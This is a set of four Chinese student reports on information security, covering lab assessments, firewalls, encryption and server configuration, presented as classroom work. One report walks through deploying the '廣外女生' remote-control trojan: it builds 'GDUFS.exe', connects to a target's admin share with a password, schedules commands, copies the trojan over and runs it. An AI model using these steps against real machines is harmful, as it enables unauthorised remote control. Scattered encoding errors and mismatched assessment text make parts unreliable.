第一篇:網絡信息安全評估報告
計算機信息安全評估報告
如何
實
現
如
下
圖
所
示
可用性1.人們通常采用一些技術措施或網絡安全設備來實現這些目標。例如:
使用防火墻,把攻擊者阻擋在網絡外部,讓他們“迚不來”。
即使攻擊者迚入了網絡內部,由于有加密機制,會使他們“改不了”和“拿不走”關 鍵信息和資源。
機密性2機密性將對敏感數據的訪問權限控制在那些經授權的個人,只有他們才能查看數據。機密性可防止向未經授權的個人泄露信息,或防止信息被加工。
如圖所示,“迚不來”和“看不懂”都實現了信息系統的機密性。
人們使用口令對迚入系統的用戶迚行身份鑒別,非法用戶沒有口令就“迚不來”,這就保證了信息系統的機密性。
即使攻擊者破解了口令,而迚入系統,加密機制也會使得他們“看不懂”關鍵信息。例如,甲給乙發送加密文件,只有乙通過解密才能讀懂其內容,其他人看到的是亂碼。由此便實現了信息的機密性。
完整性3如圖所示,“改不了”和“拿不走”都實現了信息系統的完整性。使用加密機制,可以保證信息系統的完整性,攻擊者無法對加密信息迚行修改或者復制。
不可抵賴性4如圖所示,“跑不掉”就實現了信息系統的不可抵賴性。如果攻擊者迚行了非法操作,系統管理員使用審計機制或簽名機制也可讓他們無所遁形
對考試的機房迚行“管理制度”評估。(1)評估說明
為規范管理,保障計算機設備的正常運行,創造良好的上機環境,必須制定相關的管理制度
(2)評估內容
沒有建立相應信息系統運行管理規程、缺陷管理制度、統計匯報制度、運維流程、值班制度,沒有實行工作票制度;機房出入管理制度上墻,但沒有機房迚出情況記錄(3)評估分析報告
所存在問題:1沒有系統的相關負責人,機房也是誰人都可以自由出入。2在上機過程中做與學習無關的工作。3機房財產規劃不健全等(4)評估建議
1、計算機室的管理由系統管理員負責,非機房工作人員未經允許不準迚入。未經許可不得擅自上機操作和對運行設備及各種配置迚行更改。
2、保持機房內清潔、安靜,嚴禁機房內吸煙、吐痰以及大聲喧嘩;嚴禁將易燃、易爆、易污染和強磁物品帶入機房。
3、機房內的一切物品,未經管理員同意,不得隨意挪動,拆卸和帶出機房。
4、上機時,應先認真檢查機器情況,如有問題應及時向機房管理員反應。
5、上機人員不得在機房內迚行與上機考試無關的計算機操作。
6、上機時應按規定操作,故意或因操作不當造成設備損壞,除照價賠償外,視情節輕重給予處罰。對考試的機房迚行“物理安全”評估。(1)評估說明
防火,防水,防塵,防腐蝕,主機房安裝門禁、監控與報警系統。(2)評估內容 主機房沒有安裝門禁、監控系統,有消防報警系統。(3)評估分析報告
沒有詳細的機房配線圖,機房供甴系統將動力、照明用甴與計算機系統供甴線路是分開的,機房沒有配備應急照明裝置,有定期對UPS的運行狀況迚行檢測但沒有檢測記錄。
(4)評估建議
有詳細的機房配線圖,機房供甴系統將動力、照明用甴與計算機系統供甴線路分開,機房配備應急照明裝置,定期對UPS的運行狀況迚行檢測(查看半年內檢測記錄)對考試的機房迚行“計算機系統安全”評估。(1)評估說明
應用系統的角色、權限分配有記錄;用戶賬戶的變更、修改、注銷有記錄(半年記錄情況);關鍵應用系統的數據功能操作迚行審計幵迚行長期存儲;對關鍵應用系統有應急預案;關鍵應用系統管理員賬戶、用戶賬戶口令定期迚行變更;新系統上線前迚行安全性測試。
(2)評估內容
營銷系統的角色、權限分配有記錄,其余系統沒有;用戶賬戶的變更、修改、注銷沒有記錄;關鍵應用系統的數據功能操作沒有迚行審計;沒有針對關鍵應用系統的應急預案;關鍵應用系統管理員賬戶、用戶賬戶口令有定期迚行變更;有些新系統上線前沒有迚行過安全性測試。
(3)評估分析報告
網絡中的防火墻位置部署合理,防火墻規則配置符合安全要求,防火墻規則配置的建立、更改有規范申請、審核、審批流程,對防火墻日志迚行存儲、備份。
(4)評估建議
完善系統的角色、權限分配有記錄;記錄用戶賬戶的變更、修改、注銷(半年記錄情況);關鍵應用系統的數據功能操作迚行審計;制定針對關鍵應用系統的應急預案;關鍵應用系統管理員賬戶、用戶賬戶口令定期迚行變更;新系統上線前應嚴格按照相關標準迚行安全性測試。
對考試的機房迚行“網絡與通信安全”評估。(1)評估說明
按標準部署身份認證系統、安全管理平臺、針對安全設備的日志服務器,采用漏洞掃描系統,重要系統一年迚行一次信息安全風險評估。
(2)評估內容
沒有部署身份認證系統、安全管理平臺,沒有漏洞掃描系統,重要系統沒有迚行信息安全風險評估,沒有部署針對安全設備的日志服務器。
(3)評估分析報告
按標準部署身份認證系統、安全管理平臺、針對安全設備的日志服務器,采用漏洞掃描系統,重要系統一年迚行一次信息安全風險評估。
(4)評估建議
部署身份認證系統、安全管理平臺,采用漏洞掃描系統,重要系統一年內迚行信息安全風險評估,部署針對安全設備的日志服務器。
信息安全評估:
對考試的機房迚行“日志與統計安全”評估。(1)評估說明
每天計算機上機記錄日志在冊,對系統迚行不定時的還原。對本局半年內發生的較大的、或者發生次數較多的信息安全事件迚行匯總記錄,形成本單位的安全事件列表
(2)評估內容
已成立了信息安全領導機構,但尚未成立信息安全工作機構。
(3)評估分析報告
局域網核心交換設備、城域網核心路由設備應采取設備冗余或準備備用設備,不允許外聯鏈路繞過防火墻,具有當前準確的網絡拓撲結構圖
(4)評估建議
完善信息安全組織機構,成立信息安全工作機構。
第二篇:【企業網絡】網絡信息安全報告
XX中型企業網安全 網絡信息安全報告
一、實驗目的及要求
該專周的目標是讓學生掌握網絡安全的基本框架,網絡安全的基本理論。以及了解計算機網絡安全方面的管理、配置和維護。
本課程要求在理論教學上以必需夠用為原則,應盡量避免過深過繁的理論探討,重在理解網絡安全的基本框架,網絡安全的基本理論。掌握數據加密、防火墻技術、入侵檢測技術以及學習網絡病毒防治。了解Windows 2000的安全、Web的安全、網絡安全工程以及黑客常用的系統攻擊方法。本課程要求學生對計算機的使用有一定了解(了解Windows的使用,具有鍵盤操作和文件處理的基礎),并已經掌握計算機網絡的基本原理。
二、專周內容
1、安全需求分析
(1)網絡安全問題主要集中在對服務器的安全保護、防黑客和病毒、重要網段的保護及管理安全上。因此,我們必須采取相應的安全措施杜絕安全隱患,其中應該做到:
A、公開服務器的安全保護 B、防止黑客從外部攻擊 C、入侵檢測與監控 D、病毒防護 E、數據安全保護 F、網絡的安全管理
(2)解決網絡安全問題的一些要求
A、大幅度地提高系統的安全性(重點是可用性和可控性);
B、保持網絡原有的特點,即對網絡的協議和傳輸具有良好的透明性,能透明接入,無需更改網絡設置;
C、易于操作、維護,并便于自動化管理,而不增加或少增加附加操作;
D、盡量不影響原網絡拓撲結構,同時便于系統及系統功能的擴展;
E、安全保密系統具有較好的性能價格比。一次性投資,可以長期使用;
F、安全產品具有合法性,及經過國家有關管理部門的認可或認證;
(3)系統安全目標
A、建立一套完整可行的網絡安全與網絡管理策略;
B、將內部網絡、公開服務器網絡和外網進行有效隔離,避免與外部網絡直接通信;
C、建立網站各主機和服務器的安全保護措施,保證他們的系統安全;
D、加強合法用戶的訪問認證,同時將用戶的訪問權限控制在最低限度;
E、全面監視對公開服務器的訪問,及時發現和拒絕不安全的操作和黑客攻擊行為;
F、加強對各種訪問的審計工作,詳細記錄對網絡、公開服務器的訪問行為,形成完整的系統日志;
2、網絡拓撲
3、網絡安全的基本內容
(1)基本網絡命令
A、ping命令: ping –t IP,向指定的計算機不停的發送數據包,按Ctr+Break快捷鍵可以查看統計信息并繼續運行,按 Ctr+C可中止運行。
B、Tracert命令:tracert IP 顯示從本地計算機到目標服務器所經過的計算機:
C、pathping pop.pcpop.com 除了顯示路由外,還提供325S的分析,計算丟失包的%
(2)操作系統安全
A、屏蔽不需要的服務組件
開始——程序——管理工具——服務 出現以下窗口:
然后在該對話框中選中需要屏蔽的程序,并單擊右鍵,然后選擇“停止”命令,同時將“啟動類型”設置為“手動”或“已禁用”,這樣就可以對指定的服務組進行屏蔽了。B、關閉默認共享:“開始”——“程序”——“管理工具”——“服務”——“Server”
(3)數據庫系統安全
A、使用安全的帳號策略和Windows認證模式
由于SQL Server不能更改sa用戶名稱,也不能刪除這個超級用戶,所以,我們必須對這個帳號進行最強的保護,當然,包括使用一個非常強壯的密碼,最好不要在數據庫應用中使用sa帳號,只有當沒有其它方法登錄到 SQL Server 實例(例如,當其它系統管理員不可用或忘記了密碼)時才使用 sa。可以新建立一個擁有與sa一樣權限的超級用戶來管理數據庫。安全的帳號策略還包括不要讓管理員權限的帳號泛濫。
SQL Server的認證模式有Windows身份認證和混合身份認證兩種。在任何可能的時候,應該對指向SQL Server的連接要求Windows身份驗證模式。
Windows認證模式比混合模式更優越,原因在以下:
1)它通過限制對Microsoft Windows用戶和域用戶帳戶的連接,保護SQL Server免受大部分Internet工具的侵害。
2)服務器將從Windows安全增強機制中獲益,例如更強的身份驗證協議以及強制的密碼復雜性和過期時間。
3)使用Windows認證,不需要將密碼存放在連接字符串中。存儲密碼是使用標準SQL Server登錄的應用程序的主要漏洞之一。
4)Windows認證意味著你只需要將密碼存放在一個地方。
要在SQL Server的Enterprise Manager安裝Windows身份驗證模式,步驟操作: 展開服務器組——右鍵點擊服務器——然后點擊“屬性”——在安全性選項卡的身份驗證中——點擊“僅限Windows”。(4)網絡防火墻工具:紅墻主機網絡防火墻 安裝
1.具體操作如下:
第一步: 將“愛思紅墻主機網絡防火墻”的安裝光盤插入驅動器,運行根目錄下的Setup文件來運行其安裝程序,進入“愛思紅墻主機網絡防火墻安裝”窗口;
第二步:
在“歡迎安裝愛思紅墻主機網絡防火墻”對話框中,單擊“下一步”按鈕;
第三步: 在“軟件許可協議”對話框,接受協議點擊“是”;
第四步: 點擊“是”按鈕,出現顯示您計算機的相關信息,即判斷是否可以安裝本軟件;
第五步: 單擊“下一步”按鈕,出現“選擇目標位置”對話框;
第六步: 在該對話框中,單擊“瀏覽”按鈕,并在“選擇文件夾”對話框中選擇盤符作為驅動器,再指定相應的文件夾及路徑,然后單擊“確定”按鈕;
第七步: 單擊“下一步”按鈕,出現“選擇安裝程序名稱”對話框,您可自定義程序名稱;
第八步: 單擊“下一步”按鈕,系統開始復制文件;
第九步: 進入“紅墻主機網絡防火墻配置”窗口,作出是否運行“紅墻應用程序掃描系統”的選擇后,點擊“完成”。
相關設置:告警設置:系統提供了兩種情況下的告警,即需要系統告警和不需要系統告警,您可據需要選取告警設置。
點擊主界面中的“規則管理”按鈕,彈出相應窗口,如下圖:
網絡監控中心:
(5)網絡攻擊工具:“廣外女生”
它的基本功能有:文件管理方面有上傳,下載,刪除,改名,設置屬性,建立文件夾和運行指定文件等功能;注冊表操作方面:全面模擬WINDOWS的注冊表編輯器,讓遠程注冊表編輯工作有如在本機上操作一樣方便;屏幕控制方面:可以自定義圖片的質量來減少傳輸的時間,在局域網或高網速的地方還可以全屏操作對方的鼠標及鍵盤,就像操縱自己的計算機一樣;遠程任務管理方面,可以直觀地瀏覽對方窗體,隨意殺掉對方窗體或其中的控件;其他功能還有郵件IP通知等。
主要步驟:首先運行“gwg.exe”,出現如圖窗口:
選中“服務端設置”,生成“GDUFS.exe”木馬:
然后將“GDUFS.exe”復制到自己的C盤中,再根據一些命令把“GDUFS.exe”復制到目標主機的盤中,再進行運行。目標主機的IP:191.168.12.38 具體步驟及命令:
“開始”——“運行”——“cmd”
命令:net use 191.168.12.38ipc$ 123 /user:administrator 與目標主機之間建立聯系
命令:net time 191.168.12.38 獲取目標主機的時間
命令:at 191.168.12.38 08:21 net share c$=c: 與目標主機的C盤建立通道
命令:copy c:GDUFS.exe 191.168.12.38c$ 復制“GDUFS.exe”文件到目標主機的C盤中:
命令:191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目標主機中什么時候運行。
三、專周小結:
通過這次網絡安全專周,我不僅僅是學到了很多知識,更是透徹的理解到了網絡安全對生活已經將來工作的意義。
網絡安全分為軟件網絡安全和硬件網絡安全。一般我們說的網絡安全就是軟件上的網絡安全,即局域網,互聯網安全。
網絡安全又分為內網安全和外網安全。在內外網安全中,內網安全則是重中之重。畢竟是家賊難防。據不完全統計,全國因為內網安全的問題,至少每年算是幾億美元。所以,網絡安全特別重要。
至于在將來的工作中,我們也要嚴格尊市網絡設備管理原則和使用秩序,對設備進行統一管理專人負責,嚴格要求自己對設備進行安全操作,保持強烈的責任感和服務意識,做好每一個細節,重點做好以下幾項工作:
1,及時準確判斷網絡故障,做好上門維護工作或及時提醒網絡合作商進行維護。
2,定期檢查維護各網絡設備的運行情況并進行維護。3,不定期對服務器進行更新和檢查。
4,遇到特殊情況,及時向領導和老師匯報,努力提高應急處理問題和獨立處理問題的能力。
感謝老師對我們的教導。
第三篇:網絡信息安全
網絡信息安全
信息安全是指為建立信息處理系統而采取的技術上和管理上的安全保護,以實現電子信息的保密性、完整性、可用性和可控性。當今信息時代,計算機網絡已經成為一種不可缺少的信息交換工具。然而,由于計算機網絡具有開放性、互聯性、連接方式的多樣性及終端分布的不均勻性,再加上本身存在的技術弱點和人為的疏忽,致使網絡易受計算機病毒、黑客或惡意軟件的侵害。面對侵襲網絡安全的種種威脅,必須考慮信息的安全這個至關重要的問題。
網絡信息安全分為網絡安全和信息安全兩個層面。網絡安全包括系統安全,即硬件平臺、操作系統、應用軟件;運行服務安全,即保證服務的連續性、高效率。信息安全則主要是指數據安全,包括數據加密、備份、程序等。
1.硬件安全。即網絡硬件和存儲媒體的安全。要保護這些硬設施不受損害,能夠正常工作。
2.軟件安全。即計算機及其網絡中各種軟件不被篡改或破壞,不被非法操作或誤操作,功能不會失效,不被非法復制。
3.運行服務安全。即網絡中的各個信息系統能夠正常運行并能正常地通過網絡交流信息。通過對網絡系統中的各種設備運行狀況的監測,發現不安全因素能及時報警并采取措施改變不安全狀態,保障網絡系統正常運行。
4.數據安全。即網絡中存儲及流通數據的女全。要保護網絡中的數據不被篡改、非法增刪、復制、解密、顯示、使用等。它是保障網絡安全最根本的目的。
1.防火墻技術。防火墻(Firewall)是近年來發展的最重要的安全技術,它的主要功能是加強網絡之間的訪問控制,防止外部網絡用戶以非法手段通過外部網絡進入內部網絡(被保護網絡)。它對兩個或多個網絡之間傳輸的數據包和鏈接方式按照一定的安全策略對其進行檢查,來決定網絡之間的通信是否被允許,并監視網絡運行狀態。簡單防火墻技術可以在路由器上實現,而專用防火墻提供更加可靠的網絡安全控制方法。
防火墻的安全策略有兩條。一是“凡是未被準許的就是禁止的”。防火墻先是封閉所有信息流,然后審查要求通過的信息,符合條件的就讓通過;二是“凡是未被禁止的就是允許的”,防火墻先是轉發所有的信息,然后再逐項剔除有害的內容,被禁止的內容越多,防火墻的作用就越大。網絡是動態發展的,安全策略的制定不應建立在靜態的基礎之上。在制定防火墻安全規則時,應符合“可適應性的安全管理”模型的原則,即:安全=風險分析+執行策略+系統實施+漏洞監測+實時響應。防火墻技術主要有以下三類:
●包過濾技術(Packct Filtering)。它一般用在網絡層,主要根據防火墻系統所收到的每個數據包的源IP地址、目的IP地址、TCP/UDP源端口號、TCP/UDP目的端口號及數據包中的各種標志位來進行判定,根據系統設定的安全策略來決定是否讓數據包通過,其核心就是安全策略,即過濾算法的設計。
●代理(Proxy)服務技術。它用來提供應用層服務的控制,起到外部網絡向內部網絡申請服務時的中間轉接作用。內部網絡只接受代理提出的服務請求,拒絕外部網絡其它節點的直接請求。運行代理服務的主機被稱為應用機關。代理服務還可以用于實施較強的數據流監控、過濾、記錄等功能。
●狀態監控(Statc Innspection)技術。它是一種新的防火墻技術。在網絡層完成所有必要的防火墻功能——包過濾與網絡服務代理。目前最有效的實現方法是采用 Check Point)提出的虛擬機方式(Inspect Virtual Machine)。
防火墻技術的優點很多,一是通過過濾不安全的服務,極大地提高網絡安全和減少子網中主機的風險;二是可以提供對系統的訪問控制;三是可以阻擊攻擊者獲取攻擊網絡系統的有用信息;四是防火墻還可以記錄與統計通過它的網絡通信,提供關于網絡使用的統計數據,根據統計數據來判斷可能的攻擊和探測;五是防火墻提供制定與執行網絡安全策略的手段,它可以對企業內部網實現集中的安全管理。
防火墻技術的不足有三。一是防火墻不能防止繞過防火墻的攻擊;二是防火墻經不起人為因素的攻擊。由于防火墻對網絡安全實施單點控制,因此可能受到黑客的攻擊;三是防火墻不能保證數據的秘密性,不能對數據進行鑒別,也不能保證網絡不受病毒的攻擊。
2.加密技術。數據加密被認為是最可靠的安全保障形式,它可以從根本上滿足信息完整性的要求,是一種主動安全防范策略。數據加密就是按照確定的密碼算法將敏感的明文數據變換成難以識別的密文數據。通過使用不同的密鑰,可用同一加密算法,將同一明文加密成不同的密文。當需要時可使用密鑰將密文數據還原成明文數據,稱為解密。
密鑰加密技術分為對稱密鑰加密和非對稱密鑰加密兩類。對稱加密技術是在加密與解密過程中使用相同的密鑰加以控制,它的保密度主要取決于對密鑰的保密。它的特點是數字運算量小,加密速度快,弱點是密鑰管理困難,一旦密鑰泄露,將直接影響到信息的安全。非對稱密鑰加密法是在加密和解密過程中使用不同的密鑰加以控制,加密密鑰是公開的,解密密鑰是保密的。它的保密度依賴于從公開的加密密鑰或密文與明文的對照推算解密密鑰在計算上的不可能性。算法的核心是運用一種特殊的數學函數——單向陷門函數,即從一個方向求值是容易的,但其逆向計算卻很困難,從而在實際上成為不可能。
除了密鑰加密技術外,還有數據加密技術。一是鏈路加密技術。鏈路加密是對通信線路加密;二是節點加密技術。節點加密是指對存儲在節點內的文件和數據庫信息進行的加密保護。
3.數字簽名技術。數字簽名(Digital Signature)技術是將摘要用發送者的私鑰加密,與原文一起傳送給接收者。接收者只有用發送者的公鑰才能解密被加密的摘要。在電子商務安全保密系統中,數字簽名技術有著特別重要的地位,在電子商務安全服務中的源鑒別、完整性服務、不可否認服務中都要用到數字簽名技術。
在書面文件上簽名是確認文件的一種手段,其作用有兩點,一是因為自己的簽名難以否認,從而確認文件已簽署這一事實;二是因為簽名不易仿冒,從而確定了文件是真的這一事實。數字簽名與書面簽名有相同相通之處,也能確認兩點,一是信息是由簽名者發送的,二是信息自簽發后到收到為止未曾做過任何修改。這樣,數字簽名就可用來防止:電子信息因易于修改而有人作偽;冒用別人名義發送信息;發出(收到)信件后又加以否認。
廣泛應用的數字簽名方法有RSA簽名、DSS簽名和 Hash簽名三種。RSA的最大方便是沒有密鑰分配問題。公開密鑰加密使用兩個不同的密鑰,其中一個是公開的,另一個是保密的。公開密鑰可以保存在系統目錄內、未加密的電子郵件信息中、電話黃頁上或公告牌里,網上的任何用戶都可獲得公開密鑰。保密密鑰是用戶專用的,由用戶本身持有,它可以對公開密鑰加密的信息解密。DSS數字簽名是由美國政府頒布實施的,主要用于跟美國做生意的公司。它只是一個簽名系統,而且美國不提倡使用任何削弱政府竊聽能力的加密軟件。Hash簽名是最主要的數字簽名方法,跟單獨簽名的RSA數字簽名不同,它是將數字簽名和要發送的信息捆在一起,所以更適合電子商務。
4.數字時間戳技術。在電子商務交易的文件中,時間是十分重要的信息,是證明文件有效性的主要內容。在簽名時加上一個時間標記,即有數字時間戳(Digita Timestamp)的數字簽名方案:驗證簽名的人或以確認簽名是來自該小組,卻不知道是小組中的哪一個人簽署的。指定批準人簽名的真實性,其他任何人除了得到該指定人或簽名者本人的幫助,否則不能驗證簽名
(二)網絡信忽安全的目標
1.保密性。保密性是指信息不泄露給非授權人、實休和過程,或供其使用的特性。
2.完整性。完整性是指信息未經授權不能被修改、不被破壞、不被插人、不遲延、不亂序和不丟失的特性。對網絡信息安全進行攻擊的最終目的就是破壞信息的完整性。
3.可用性。可用性是指合法用戶訪問并能按要求順序使用信息的特性,即保證合法用戶在需要時可以訪問到信息
4.可控性。可控性是指授權機構對信息的內容及傳播具有控制的能力的特性,可以控制授權范圍內的信息流向以及方式。
5.可審查性。在信息交流過程結束后,通信雙方不能抵賴曾經做出的行為,也不能否認曾經接收到對方的信息。
網絡信息安全面臨的問題
1.網絡協議和軟件的安全缺陷
因特網的基石是TCP/IP協議簇,該協議簇在實現上力求效率,而沒有考慮安全因素,因為那樣無疑增大代碼量,從而降低了TCP/IP的運行效率,所以說TCP/IP本身在設計上就是不安全的。很容易被竊聽和欺騙:大多數因特網上的流量是沒有加密的,電子郵件口令、文件傳輸很容易被監聽和劫持。很多基于TCP/IP的應用服務都在不同程度上存在著安全問題,這很容易被一些對TCP/IP十分了解的人所利用,一些新的處于測試階級的服務有更多的安全缺陷。缺乏安全策略:許多站點在防火墻配置上無意識地擴大了訪問權限,忽視了這些權限可能會被內部人員濫用,黑客從一些服務中可以獲得有用的信息,而網絡維護人員卻不知道應該禁止這種服務。配置的復雜性:訪問控制的配置一般十分復雜,所以很容易被錯誤配置,從而給黑客以可乘之機。TCP/IP是被公布于世的,了解它的人越多被人破壞的可能性越大。現在,銀行之間在專用網上傳輸數據所用的協議都是保密的,這樣就可以有效地防止入侵。當然,人們不能把TCP/IP和其實現代碼保密,這樣不利于TCP/IP網絡的發展。2.黑客攻擊手段多樣
進人2006年以來,網絡罪犯采用翻新分散式阻斷服務(DDOS)攻擊的手法,用形同互聯網黃頁的域名系統服務器來發動攻擊,擾亂在線商務。寬帶網絡條件下,常見的拒絕服務攻擊方式主要有兩種,一是網絡黑客蓄意發動的針對服務和網絡設備的DDOS攻擊;二是用蠕蟲病毒等新的攻擊方式,造成網絡流量急速提高,導致網絡設備崩潰,或者造成網絡鏈路的不堪負重。
調查資料顯示,2006年初發現企業的系統承受的攻擊規模甚于以往,而且來源不是被綁架的“僵尸”電腦,而是出自于域名系統(DNS)服務器。一旦成為DDOS攻擊的目標,目標系統不論是網頁服務器、域名服務器,還是電子郵件服務器,都會被網絡上四面八方的系統傳來的巨量信息給淹沒。黑客的用意是借人量垃圾信息妨礙系統正常的信息處理,借以切斷攻擊目標對外的連線。黑客常用“僵尸”電腦連成網絡,把大量的查詢要求傳至開放的DNS服務器,這些查詢信息會假裝成被巨量信息攻擊的目標所傳出的,因此DNS服務器會把回應信息傳到那個網址。
美國司法部的一項調查資料顯示,1998年3月到2005年2月期間,82%的人侵者掌握授權用戶或設備的數據。在傳統的用戶身份認證環境下,外來攻擊者僅憑盜取的相關用戶身份憑證就能以任何臺設備進人網絡,即使最嚴密的用戶認證保護系統也很難保護網絡安全。另外,由于企業員工可以通過任何一臺未經確認和處理的設備,以有效合法的個人身份憑證進入網絡,使間諜軟件、廣告軟件、木馬程序及其它惡意程序有機可乘,嚴重威脅網絡系統的安全。
有資料顯示,最近拉美國家的網絡詐騙活動增多,作案手段先進。犯罪活動已經從“現實生活轉入虛擬世界”,網上詐騙活動日益增多。3.計算機病毒
第四篇:網絡信息安全實訓報告
西安航空職業技術學院
課 程 設 計 任 務 書
課題名稱:網絡與信息安全實訓
設計內容: 1.文檔的加密 2.網絡服務器的安全配置 3.數據
備份與恢復 4.網絡安全防護 5.應用安全
技術條件或要求:1.掌握常用的加密算法原理;會使用加密軟件對文件、文件夾或郵件進行加密。2.掌握FTP服務器及客戶端的配置;Web服務安全。3.掌握數據備份的方法;會使用數據恢復軟件進行數據恢復。用FileGee備份數據。4.掌握用sniffer捕獲數據包,用sniffer實時監測網絡。5.能用天網防火墻防范木馬;用天網防火墻打開21和80端口。6.數字證書作用;支付寶數字證書的申請、安裝與取消;USB Key的使用。
指導教師(簽名): 教研室主任(簽名):
開題日期: 2015 年 6 月 29 日 完成日期: 2015 年 7 月 03 日
摘 要
隨著計算機技術的不斷發展,計算機網絡已經成為信息時代的重要特征,人們稱它為信息高速公路。網絡是計算機技術和通信技術的產物,是應社會對信息共享和信息傳遞的要求發展起來的,各國都在建設自己的信息高速公路。我國近年來計算機網絡發展的速度也很快,在國防、電信、銀行、廣播等方面都有廣泛的應用。
我相信在不長的時間里,計算機網絡一定會得到極大的發展,那時將全面進入信息時代。不當正因為網絡應用的如此廣泛,又在生活中扮演很重要的角色,所以其安全性是不容忽視的,它是網絡能否經歷考驗的關鍵,如果安全性不好會給人們帶來很多麻煩。網絡信息交流現已是生活中必不可少的一個環節,然而信息安全卻得不到相應的重視。本文針對網絡信息安全技術進行的探討。
關鍵詞:計算機技術;網絡信息;安全性;信息安全 目錄
1.文檔的加密........................................................................................................................................1 1.1對稱加密工具APOCALYPSO的使用.................................................................................................1 1.2 PGP軟件的使用...........................................................................................................................2
1.2.1 PGP軟件的介紹....................................................................................................2 1.2.2 PGP軟件的安裝....................................................................................................3 1.2.3 PGP軟件的秘鑰生成............................................................................................4 1.2.4 PGP軟件的郵件加密解密....................................................................................5
2.網絡服務器的安全配置....................................................................................................................6 2.1 安裝IIS6.0.................................................................................................................................6
2.1.1安裝Internet 信息服務.....................................................................................6 2.1.2配置匿名身份驗證................................................................................................7 2.2 基本 WEB 站點配置......................................................................................................................8 2.3讓IIS以最小的NTFS權限運行.................................................................................................8
3.數據備份和恢復................................................................................................................................9 3.1FILEGEE軟件.................................................................................................................................9
3.1.1FileGee軟件介紹..............................................................................................9 3.1.2 FileGee軟件使用..........................................................................................10 4.網絡安全防護..................................................................................................................................12 4.1 SNIFFERPRO數據包捕獲與協議分析...........................................................................................12
4.1.1實驗原理..............................................................................................................12 4.1.2基本的網絡數據幀的捕獲和解碼......................................................................12 4.2 天網防火墻的使用.....................................................................................................................14
5.應用安全..........................................................................................................................................17 5.1支付寶數字證書.........................................................................................................................17 5.2 USB KEY的使用........................................................................................................................18 總結........................................................................................................................................................19 參考文獻................................................................................................................................................19
1.文檔的加密
1.1對稱加密工具Apocalypso的使用
⑴打開此軟件進入主界面
圖-主界面
⑵選擇此軟件
圖-密鑰以及文件選擇界面
⑷完成加密
圖-完成加密界面
1.2 PGP軟件的使用
1.2.1 PGP軟件的介紹
PGP軟件的英文全名是“Pretty Good Privacy”,是一個廣泛用于電子郵件和其他場合的十分出色的加密軟件。PGP實現了大部分加密和認證的算法,如Blowfish,CAST,DES,IDEA,RC2,RC4,RC5,Safer,Safer-SK等
傳統的加密方法,以及MD2,MD4,MD5,RIPEMD-160,SHA等散列算法,當然也包括D-H,DSA,Elgamal,RSA等公開密鑰加密算法。PGP先進的加密技術使它成為最好的、攻擊成本最高的安全性程序 1.2.2 PGP軟件的安裝
⑴選擇用戶類型,首次安裝選擇No, I’m a New User
圖-選擇用戶類型
⑵確認安裝的路徑選擇安裝應用組件
圖-安裝PGP—選擇應用組件
⑶安裝完畢后,重新啟動計算機;重啟后,PGP Desktop已安裝在電腦上安裝向導會繼續PGP Desktop注冊,填寫注冊碼及相關信息,完成安裝。
圖—填寫注冊信息
1.2.3 PGP軟件的秘鑰生成
⑴打開Open PGP Desktop,在菜單中選擇PGPKeys,在 Key Generation Winzrad提示向導下,創建用戶密鑰對。
圖-PGP密鑰生成向導
⑵輸入用戶名及郵件地址
圖-輸入用戶名及郵箱
⑶輸入用戶保護私鑰口令,完成秘鑰生成。
圖-輸入用戶保護私鑰口令
1.2.4 PGP軟件的郵件加密解密
⑴打開Outlook Express,填寫好郵件內容后,選擇Outlook 工具欄菜單中的PGP 加密圖標,使用用戶公鑰加密郵件內容
圖-選擇加密郵件
⑵發送加密郵件
圖-加密后的郵件 ⑶收到郵件打開后,選中加密郵件后選擇復制,打開Open PGP Desktop,在菜單中選擇PGPmail,在PGPmail中選擇解密/效驗,在彈出的“選擇文件并解密/效驗”對話框中選擇剪貼板,將要解密的郵件內容復制到剪貼板中。
圖-解密郵件
⑷輸入用戶保護私鑰口令后,郵件被解密還原。
圖-輸入用戶保護私鑰口令
2.網絡服務器的安全配置
2.1 安裝IIS6.0 2.1.1安裝Internet 信息服務
Microsoft Internet 信息服務(IIS)是與 Windows Server 2003 集成的 Web 服務。要安裝
IIS、添加可選組件或刪除可選組件,請按以下步驟操作: ⑴單擊開始,指向控制面板,然后單擊“添加或刪除程序”。“添加或刪除程序”工具就會啟動。
⑵單擊添加/刪除 Windows 組件。顯示“Windows 組件向導”。⑶在Windows 組件 列表中,單擊Web 應用程序服務器。⑷單擊詳細信息,然后單擊Internet 信息服務(IIS)。⑸.單擊詳細信息,以查看 IIS 可選組件列表。
⑹選擇您要安裝的可選組件。默認情況下,下列組件是選中的:---公用文件
---FrontPage 2002 Server Extentions---Internet 信息服務管理單元---Internet 信息服務管理器---NNTP 服務---SMTP 服務
---World Wide Web 服務
⑺單擊“World Wide Web 服務”,然后單擊詳細信息,以查看 IIS 可選子組件(如 Active Server Pages 組件和“遠程管理(HTML)工具”)的列表。選擇您要安裝的可選子組件。默認情況下,下列組件是選中的:
---World Wide Web 服務
⑻單擊確定,直到返回“Windows 組件向導”。⑼單擊下一步,然后完成“Windows 組件向導”。2.1.2配置匿名身份驗證
要配置匿名身份驗證,請按以下步驟操作:
⑴單擊開始,指向管理工具,然后單擊Internet 信息服務(IIS)。⑵展開“* 服務器名稱”(其中服務器名稱為該服務器的名稱),右鍵單擊Web 站點,然后單擊屬性。
⑶在Web 站點屬性對話框中,單擊目錄安全性選項卡。⑷在“身份驗證和訪問控制”下,單擊編輯。⑸單擊“啟用匿名訪問”復選框,將其選中。備注:“用戶名”框中的用戶帳戶只用于通過Windows Guest帳戶進行匿名訪問。默認情況下,服務器會創建并使用帳戶IUSR_computername。匿名用戶帳戶密碼僅在Windows中使用;匿名用戶不使用用戶名和密碼登錄。
⑹在“已驗證身份的訪問”下,單擊“集成的 Windows 身份驗證”復選框,將其選中。
⑺單擊確定兩次。
2.2 基本 Web 站點配置
⑴單擊開始,指向管理工具,然后單擊Internet 信息服務(IIS)。⑵展開“* 服務器名稱”(其中服務器名稱為該服務器的名稱),然后展開Web 站點。
⑶右鍵單擊默認Web站點,然后單擊屬性。
⑷單擊Web站點選項卡。如果您已為計算機分配了多個IP地址,則請在IP地址框中單擊您要指定給此Web站點的IP地址。
⑸單擊性能選項卡。使用Web站點屬性-性能對話框可設置影響內存、帶寬使用和Web連接數量的屬性。
